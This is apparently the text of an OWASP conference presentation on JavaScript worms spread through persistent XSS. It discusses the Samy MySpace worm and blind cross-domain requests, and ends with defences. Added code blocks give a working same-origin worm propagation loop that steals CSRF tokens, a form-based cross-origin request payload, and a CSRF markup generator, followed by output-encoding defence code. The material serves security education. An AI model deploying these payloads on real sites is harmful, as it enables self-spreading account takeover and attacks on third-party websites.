OWASPAU08_Session_7_Mosse

Javascript worms
The next step in the evolution
By Benjamin Mossé
SecPro
www.secpro.com.au
Synopsis
• Introduction to cross site scripting
• Permanent XSS
• Javascript worms up to now
• A fresh technique: remote request
• Using APIs to build worms
• Protecting yourself
• Conclusion
Introduction to XSS
• The most common web vulnerability
• Allows client side script injection (html,
javascript, vbscript, etc.)
• The target executes the malicious code
• There isn't any “magic” solution against it
Introduction to XSS (cont.)
• Javascript is the language used to exploit
this vulnerability
• Before 2005, XSS wasn't considered critical
• Wrong idea: "you can only steal cookies with it"
• 2005: Ajax (XMLHttpRequest) became mainstream; injected script can
now issue HTTP requests inside the victim's authenticated session
Introduction to XSS (cont.)
• 3 different types:
– Non permanent
– Permanent
– Dom-based
• A JavaScript payload works the same way with every one of them;
only the way it is delivered differs
Permanent XSS
• Stays on the website permanently
• Known also as Persistent
• The JavaScript exploit is stored server-side (e.g. in a database
or an RSS feed) and served back to every visitor
• Affects every person visiting the infected page
Permanent XSS (cont.)
[Diagram]
• The hacker inserts malicious code in a form on the vulnerable site
• The website saves the script into its database: the site is now infected
• Every user visiting the infected page gets exploited
"Samy is my Hero"
• Infected over a million MySpace profiles within a day and forced
MySpace offline
• Most famous Javascript worm
• Spread through a permanent XSS in the profile page
• Made infected users' browsers issue requests with Ajax, in their
own sessions
• Each visitor's own profile was rewritten to carry the worm, so
viewing an infected profile infected yours
Samy is my Hero (analysis)
[Diagram: MYSPACE.COM]
• Users visit the worm page hosted on MySpace
• The infected page makes each visitor's browser infect other pages on the same website:
THE WORM IS SPREADING EVERYWHERE
Why Javascript worms suit the attacker
• Very hard to detect
• Very stealthy: runs in the background and need not visibly
modify the page
• The attacker never sends the malicious requests; the browsers of
exploited users do
• Can spread very quickly
• Beyond a certain point the attacker cannot be traced back: every
request in the target's logs comes from a victim
Using Ajax
• Perform HTTP requests on the infected website, in the victim's
authenticated session (cookies are sent automatically)
• NO REMOTE REQUESTS: XMLHttpRequest only works on the same
origin (same-origin policy)
• Hacking possibilities: make the target send requests they didn't
intend to (e.g. password modification, delete account, change email,
change secret question, exploit SQL injection, exploit remote code
execution, spread the worm, deface the website ...)
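The same-origin request loop described above, as an added example that is not code from the original slides. It shows the pattern Samy used: fetch the profile edit page, read the anti-CSRF token out of the response (possible only because the request stays on the infected site's origin), then POST the worm back into the victim's own profile. The real worm used XMLHttpRequest; here `transport(method, url, body)` is a hypothetical injectable function, and the URLs, the `token` and `about_me` field names and the in-memory site are constructed for the example so it runs offline.

```javascript
// Added example, not code from the original slides: the same-origin
// request loop a Samy-style worm runs from a victim's browser. The real
// thing uses XMLHttpRequest; here `transport(method, url, body)` is a
// hypothetical injectable function so the loop can run offline.

// Pull the hidden anti-CSRF token out of the profile edit page. The field
// name "token" and the page layout are assumptions for this example.
function extractToken(html) {
  const m = html.match(/name="token"\s+value="([^"]+)"/);
  return m ? m[1] : null;
}

// URL-encoded body of the profile update that re-plants the worm in the
// victim's own profile ("about_me" is an assumed field name).
function buildUpdateBody(token, payload) {
  return 'token=' + encodeURIComponent(token) +
         '&about_me=' + encodeURIComponent(payload);
}

// One propagation step. Because both requests stay on the infected site's
// origin, the script may READ the first response, which is what lets it
// defeat a per-request token; cross-origin requests would be blind.
function propagate(transport, payload) {
  const page = transport('GET', '/profile/edit', null);
  const token = extractToken(page);
  if (!token) return false;            // token scheme changed: worm stalls
  const status = transport('POST', '/profile/update',
                           buildUpdateBody(token, payload));
  return status === 200;
}

// Constructed in-memory stand-in for the vulnerable site (no network),
// enforcing the token the same way the site would.
function makeFakeSite() {
  const state = { token: 'tok-7f3a', aboutMe: 'hello' };
  function transport(method, url, body) {
    if (method === 'GET' && url === '/profile/edit') {
      return '<form><input type="hidden" name="token" value="' + state.token + '"></form>';
    }
    if (method === 'POST' && url === '/profile/update') {
      const params = new URLSearchParams(body);
      if (params.get('token') !== state.token) return 403;
      state.aboutMe = params.get('about_me');   // stored XSS: saved verbatim
      return 200;
    }
    return 404;
  }
  return { state, transport };
}

// Stand-alone run: the payload is a constructed stand-in for the worm's
// own source (a real worm would pass its full code here).
const WORM_PAYLOAD = '<div style="background:url(\'javascript:spread()\')">samy is my hero</div>';
const site = makeFakeSite();
console.log('propagated:', propagate(site.transport, WORM_PAYLOAD));
console.log('stored about_me:', site.state.aboutMe);
```

The check in `propagate` is the point: the worm can only survive a per-request token because it reads the token from a same-origin response. Tokens alone therefore do not stop a worm that already runs on the origin; they stop cross-origin forgery.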
A fresh technique: remote requests
• Is it really impossible to make remote HTTP requests with
Javascript? -> NO!
• The same-origin policy only stops the script from reading a
cross-domain response; the browser still sends the request, with
the victim's cookies for the target domain attached (a blind CSRF)
GET request methodologies:
- Append an image to the page
(e.g. <img src="http://www.target.com/page.php?var=value" />)
- Append a frame to the page
(e.g. <iframe src="http://www.target.com/page.php?var=value"></iframe>)
POST request methodologies:
- Append a complete form to the page
- Submit the form with Javascript
(e.g. form.submit();)
Processing POST requests
var objBody = document.getElementsByTagName("body")[0];
var form = document.createElement("form");
// the slide describes a POST; without an explicit method the browser sends a GET
form.setAttribute("method", "POST");
form.setAttribute("action", "http://www.targetonotherdomain.com/page.php");
var input_username = document.createElement("input");
input_username.setAttribute("type", "hidden");
// the original created the "name" attribute but never gave it a value, so the field was sent without a name
input_username.setAttribute("name", "username");
// the value is an example; a real payload carries whatever the target form expects
input_username.setAttribute("value", "attacker");
form.appendChild(input_username);
objBody.appendChild(form);
// submit the form we just built, not whichever <form> happens to be first in the page
form.submit();
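The two blind cross-domain request methods from the previous slides (image for GET, auto-submitting form for POST), as an added example that is not code from the original slides. It generates the markup a worm would inject, and adds the detail a practitioner needs: the form submits into a hidden iframe, because a plain `form.submit()` navigates the infected page away and kills the worm. The target URLs and parameter names are invented for illustration; `attrEscape` keeps a payload value from breaking out of the generated attributes.

```javascript
// Added example, not code from the original slides: generate the markup
// for the two blind cross-origin request methods. The same-origin policy
// blocks READING the response; the request itself still reaches the
// target with the victim's cookies. URLs and parameter names are made up.

// Escape a string for placement inside a double-quoted HTML attribute,
// so a parameter value cannot break out of the generated markup.
function attrEscape(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// GET: an <img> whose src carries the parameters in the query string.
function buildGetRequest(url, params) {
  const qs = Object.entries(params)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v))
    .join('&');
  return `<img src="${attrEscape(url + '?' + qs)}" alt="">`;
}

// POST: a form of hidden inputs that submits itself into a hidden iframe.
// Targeting the iframe keeps the infected page (and the worm) alive; a
// top-level form.submit() would navigate away and stop the script.
function buildPostRequest(url, params) {
  const inputs = Object.entries(params)
    .map(([k, v]) => `<input type="hidden" name="${attrEscape(k)}" value="${attrEscape(v)}">`)
    .join('');
  return [
    '<iframe name="sink" style="display:none"></iframe>',
    `<form id="csrf" method="POST" action="${attrEscape(url)}" target="sink">${inputs}</form>`,
    '<script>document.getElementById("csrf").submit();</script>',
  ].join('\n');
}

// Stand-alone run with the (invented) targets from the slides.
console.log(buildGetRequest('http://www.target.com/page.php', { var: 'value' }));
console.log(buildPostRequest('http://www.targetonotherdomain.com/page.php',
                             { email: 'attacker@example.invalid' }));
```

Both functions only build markup; appending it to the infected page (e.g. via `document.body.insertAdjacentHTML`) is what fires the request. Nothing in either method lets the worm see whether the request succeeded.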
GNUCITIZEN: AttackAPI
• Hackers' JavaScript library for building Javascript worms
• Uses Google's APIs to search for targets
• Makes manipulating web pages with Javascript easy
• Other features: cookie stealing and modification, CSRF attacks,
port scanning, form hijacking and more!
• And much more to come in the next version
Future worms
[Diagram]
1. Users visit a web page infected with a worm
2. The worm looks for vulnerable targets on the Internet using the Google API
3. The worm uses the visitors to infect or attack the list of OTHER WEBSITES it found
Risk? Consequences?
• Obviously very high!
• Imagine someone finding a permanent XSS on a website like MySpace
and using its users to launch an attack on other Internet websites
• Imagine your company website being targeted by millions of
MySpace users
• Imagine that when security experts look at who hacked a website,
they don't find the attacker's IP address but yours
• What will you do?
Protecting your applications
"Satisfaction remains a shape of resignation"
• Start by educating your programmers in secure programming
(validate input, encode every untrusted value before writing it
into a page)
• Have your web applications security-checked regularly (SecPro
offers this)
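An added example of the encoding discipline that stops a stored payload from executing when a profile is rendered; this is not code from the original slides. It encodes every untrusted field for the HTML context it lands in and only lets http(s) URLs into link attributes, rejecting `javascript:` URLs including ones broken up with control characters. The field names and page layout are invented for illustration.

```javascript
// Added example, not code from the original slides: context-aware output
// encoding for a profile page, so stored script text is displayed rather
// than executed. Field names and layout are invented for illustration.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode for an HTML text node or a double-quoted attribute value.
function encodeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Only allow absolute http(s) URLs in href/src. Control characters are
// stripped first so "java\nscript:" cannot slip past the scheme check.
function safeUrl(s) {
  const url = String(s).trim().replace(/[\u0000-\u001f]/g, '');
  return /^https?:\/\//i.test(url) ? url : null;
}

// Render a profile from stored, untrusted fields. Every value is encoded
// for the context it is written into; no value is ever emitted raw.
function renderProfile(profile) {
  const link = safeUrl(profile.homepage);
  return [
    `<h2>${encodeHtml(profile.name)}</h2>`,
    `<p>${encodeHtml(profile.aboutMe)}</p>`,
    link ? `<a href="${encodeHtml(link)}">homepage</a>` : '',
  ].join('\n');
}

// Stand-alone run with a constructed Samy-style stored payload.
console.log(renderProfile({
  name: 'samy',
  aboutMe: '<div style="background:url(\'javascript:spread()\')">samy is my hero</div>',
  homepage: 'java\nscript:spread()',
}));
```

The payload comes out as visible text (`&lt;div style=&quot;...`) and the link is dropped, so the stored worm code never reaches the parser as markup. The same rule applies to every place a stored value is written, including JSON and script blocks, which need their own encoders.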
Conclusion
• It's now possible to attack the Internet at scale from a single
XSS vulnerability
• Never underestimate the cross site scripting
vulnerability again!
• Protect your web application against it, not
only for your personal security but for the
entire Internet community
Benjamin Mossé
• Security Specialist with SecPro (Melbourne,
Australia)
• Researcher & programmer
• benjamin.mosse@secpro.com.au
• SecPro specializes in penetration testing and web application
security consulting.